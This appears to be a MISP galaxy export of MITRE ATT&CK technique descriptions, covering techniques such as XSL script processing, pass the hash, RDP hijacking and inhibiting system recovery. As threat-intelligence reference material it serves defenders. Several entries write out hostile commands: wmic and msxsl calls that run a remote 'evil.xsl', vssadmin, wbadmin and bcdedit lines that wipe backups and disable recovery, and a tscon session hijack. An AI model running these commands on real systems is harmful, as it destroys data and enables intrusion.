- revoked-by: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072"
Application Layer Protocol - T1071

Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

The tag is: *misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071"

Credentials in Files - T1081

Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)

The tag is: *misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081"

Credentials in Files - T1081 has relationships with:
Remote System Discovery - T1018

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or `<code>net view</code>` using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: `<code>C:\Windows\System32\Drivers\etc\hosts</code>` or `<code>/etc/hosts</code>)) in order to discover the hostname to IP address mappings of remote systems.

Specific to macOS, the `<code>bonjour</code>` protocol exists to discover additional Mac-based systems within the same broadcast domain.

The tag is: `misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018"`

Indirect Command Execution - T1202

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: 1434)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.

The tag is: `misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202"`

### XSL Script Processing - T1220

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)

**Command-line examples:**

- `<code>msxsl.exe customers[.]xml script[.]xsl</code>`
- `<code>msxsl.exe script[.]xsl script[.]xsl</code>`
- `<code>msxsl.exe script[.]jpeg script[.]jpeg</code>`

Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar
to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/"Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the `/FORMAT` switch.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)

- Local File: `<code>wmic process list /FORMAT:evil\.xsl</code>`
- Remote File: `<code>wmic os get /FORMAT:"https[://]//example\.com/evil\.xsl"</code>`

The tag is: `misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220"`

### Table 3324. Table References

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### Standard Cryptographic Protocol - T1032

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: `misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032"`

Standard Cryptographic Protocol - T1032 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573"` with estimative-language:likelihood-probability="almost-certain"

### Table 3325. Table References

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</table>
Derive intelligence requirements - T1230

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1230).

Leadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)

The tag is: `misp-galaxy:mitre-attack-pattern="Derive intelligence requirements - T1230"`

Table 3326. Table References

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Custom Cryptographic Protocol - T1024

Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.

Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.

Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)

The tag is: `misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024"`

Custom Cryptographic Protocol - T1024 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573"` with estimative-language:likelihood-probability="almost-certain"

Table 3327. Table References

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Domain Generation Algorithms - T1520

Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution. (Citation: securelist rotexy 2018)

DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1520"

Table 3328. Table References

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Parent PID Spoofing - T1502

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the `<code>CreateProcess</code>` API call, which supports a parameter that defines the PPID to use. (Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via `<code>svchost.exe</code>` or `<code>consent.exe</code>`) rather than the current user context. (Citation: Microsoft UAC Nov 2018)

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1085) to be `<code>explorer.exe</code>` rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). (Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Execution through API](https://attack.mitre.org/techniques/T1106). (Citation: CTD PPID Spoofing Macro Mar 2019) (Citation: CounterCept PPID Spoofing Dec 2018)

Explicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/1438).
**Parent PID Spoofing - T1502**

Adversaries in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as `<code>lsass.exe</code>`), causing the new process to be elevated via the inherited access token. (Citation: XPNSec PPID Nov 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1502"`

Parent PID Spoofing - T1502 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004"` with estimative-language:likelihood-probability="almost-certain"

**Table 3329. Table References**

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**Rogue Domain Controller - T1207**

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish
backdoors for Persistence. (Citation: DCShadow Blog)

The tag is: `misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207"`

**Software Deployment Tools - T1072**

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.

The tag is: `misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072"`

**System Information Discovery - T1082**

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS `systemsetup` command, but it requires administrative privileges.

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine. (Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virtual Machine API)

The tag is: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"*

### Windows Remote Management - T1028

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

The tag is: *misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028"*

Windows Remote Management - T1028 has relationships with:


### Table 3332. Table References

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</table>
Commonly Used Port - T1043

This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as

- TCP:80 (HTTP)
- TCP:443 (HTTPS)
- TCP:25 (SMTP)
- TCP/UDP:53 (DNS)

They may use the protocol associated with the port or a completely different protocol.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are

- TCP/UDP:135 (RPC)
- TCP/UDP:22 (SSH)
- TCP/UDP:3389 (RDP)

The tag is: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"

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<td><a href="https://attack.mitre.org/techniques/T1043">https://attack.mitre.org/techniques/T1043</a></td>
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Private whois services - T1305

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1305).

Every domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private ‘whois’ services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Private whois services - T1305"

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<td><a href="https://attack.mitre.org/techniques/T1305">https://attack.mitre.org/techniques/T1305</a></td>
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</table>
Security Software Discovery - T1063

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Windows

Example commands that can be used to obtain security software information are \[netsh](https://attack.mitre.org/software/S0108), \<code>reg query</code> with \[Reg](https://attack.mitre.org/software/S0075), \<code>dir</code> with \[cmd](https://attack.mitre.org/software/S0106), and \[Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.

Mac

It’s becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

The tag is: \texttt{misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063"}

Security Software Discovery - T1063 has relationships with:


Table 3336. Table References

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Test physical access - T1360

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1360).

An adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)

The tag is: \texttt{misp-galaxy:mitre-attack-pattern="Test physical access - T1360"}

Table 3337. Table References
Exploit OS Vulnerability - T1404

A malicious app can exploit unpatched vulnerabilities in the operating system to obtain escalated privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"

Table 3338. Table References

Exploit TEE Vulnerability - T1405

A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405"

Table 3339. Table References

Network Service Scanning - T1046

Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.

Within cloud environments, adversaries may attempt to discover services running on other cloud
hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

The tag is: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"

Table 3340. Table References

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<td><a href="https://capec.mitre.org/data/definitions/300.html">https://capec.mitre.org/data/definitions/300.html</a></td>
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**Proxy Through Victim - T1604**

Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary's traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites. (Citation: Threat Fabric Exobot)

The most common type of proxy is a SOCKS proxy. It can typically be implemented using standard OS-level APIs and 3rd party libraries with no indication to the user. On Android, adversaries can use the **Proxy** API to programmatically establish a SOCKS proxy connection, or lower-level APIs to interact directly with raw sockets.

The tag is: misp-galaxy:mitre-attack-pattern="Proxy Through Victim - T1604"

Table 3341. Table References

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**Windows Management Instrumentation - T1047**

Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)

An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047"
Inhibit System Recovery - T1490

Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

- `<code>vssadmin.exe</code>` can be used to delete all volume shadow copies on a system - `<code>vssadmin.exe delete shadows /all /quiet</code>`
- [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - `<code>wmic shadowcopy delete</code>`
- `<code>wbadmin.exe</code>` can be used to delete the Windows Backup Catalog - `<code>wbadmin.exe delete catalog -quiet</code>`
- `<code>bcedit.exe</code>` can be used to disable automatic Windows recovery features by modifying boot configuration data - `<code>bcedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcedit /set {default} recoveryenabled no</code>`

The tag is: `misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490"`
**Server Software Component - T1505**

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.

The tag is: `misp-galaxy:mitre-attack-pattern="Server Software Component - T1505"`

**Table 3344. Table References**

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**Archive Collected Data - T1560**

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

The tag is: `misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560"`

**Table 3345. Table References**

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**Web Session Cookie - T1506**

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated. (Citation: Pass The Cookie)

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary then imports the cookie into a browser they control and is able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems. (Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: `misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1506"`

Web Session Cookie - T1506 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004"` with `estimative-language:likelihood-probability="almost-certain"`

**Uncommonly Used Port - T1065**

Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.

The tag is: `misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065"`

Uncommonly Used Port - T1065 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571"` with `estimative-language:likelihood-probability="almost-certain"`

**Network Information Discovery - T1507**

Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.

The tag is: `misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507"`
Pass the Hash - T1075

Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075"

Pass the Hash - T1075 has relationships with:


Table 3349. Table References

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Lateral Tool Transfer - T1570

Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

The tag is: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570"

Table 3350. Table References

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Suppress Application Icon - T1508

A malicious application could suppress its icon from being displayed to the user in the application
launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions.

This behavior has been seen in the BankBot/Spy Banker family of malware. (Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)

The tag is: `misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508"`

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**Cloud Infrastructure Discovery - T1580**

An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a `<code>DescribeInstances</code>` API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the `<code>ListBuckets</code>` API that returns a list of all buckets owned by the authenticated sender of the request. (Citation: Amazon Describe Instance) Similarly, GCP's Cloud SDK CLI provides the `<code>gcloud compute instances list</code>` command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command `<code>az vm list</code>` lists details of virtual machines. (Citation: Microsoft AZ CLI)

An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user. (Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence. (Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.

The tag is: `misp-galaxy:mitre-attack-pattern="Cloud Infrastructure Discovery - T1580"`

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Uncommonly Used Port - T1509

Adversaries may use non-standard ports to exfiltrate information.

The tag is: `misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509"`

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<td><a href="https://attack.mitre.org/techniques/T1509">https://attack.mitre.org/techniques/T1509</a></td>
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Forge Web Credentials - T1606

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)

Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)

The tag is: `misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606"`

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Remote Desktop Protocol - T1076

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)

Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, `<code>c:\windows\system32\tscon.exe [session number to be stolen]</code>`, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)

The tag is: `misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076"

Remote Desktop Protocol - T1076 has relationships with:


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</table>
Container Administration Command - T1609

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.(Citation: Kubectl Exec Get Shell)

The tag is: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609"

Table 3356. Table References

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<td><a href="https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/">https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/</a></td>
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NTFS File Attributes - T1096

Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)
The tag is: *misp-galaxy:mitre-attack-pattern*="NTFS File Attributes - T1096"

NTFS File Attributes - T1096 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with 
estimative-language:likelihood-probability="almost-certain"

**Table 3357. Table References**

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**Permission Groups Discovery - T1069**

Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

The tag is: *misp-galaxy:mitre-attack-pattern*="Permission Groups Discovery - T1069"

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<td><a href="https://capec.mitre.org/data/definitions/576.html">https://capec.mitre.org/data/definitions/576.html</a></td>
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**Windows Admin Shares - T1077**

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `<code>C$</code>`, `<code>ADMIN$</code>`, and `<code>IPC$</code>`.

Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote
procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)

The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using `<code>net use</code>` commands with valid credentials. (Citation: TechNet Use)

The tag is: *misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077"

Windows Admin Shares - T1077 has relationships with:


*Table 3359. Table References*

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**Pass the Ticket - T1097**

Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

